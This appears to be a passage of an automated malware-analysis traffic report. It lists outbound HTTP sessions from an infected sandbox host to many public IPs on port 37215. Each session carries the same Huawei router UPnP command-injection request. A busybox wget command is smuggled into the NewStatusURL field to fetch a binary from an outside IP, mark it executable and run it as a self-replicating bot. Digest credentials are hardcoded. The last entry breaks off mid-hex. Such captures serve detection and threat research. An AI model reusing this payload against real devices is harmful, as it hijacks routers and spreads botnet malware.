                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2262192.168.2.134804886.196.109.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779566050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2263192.168.2.134446241.65.102.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779584885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2264192.168.2.13440801.231.220.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779599905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2265192.168.2.1357986157.80.6.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779612064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2266192.168.2.1349172157.82.189.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779652119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2267192.168.2.135929441.232.72.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779653072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2268192.168.2.1350898157.48.145.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779671907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2269192.168.2.1349106157.71.92.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779691935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2270192.168.2.1343628197.246.81.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779707909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2271192.168.2.1352550197.117.163.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779728889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 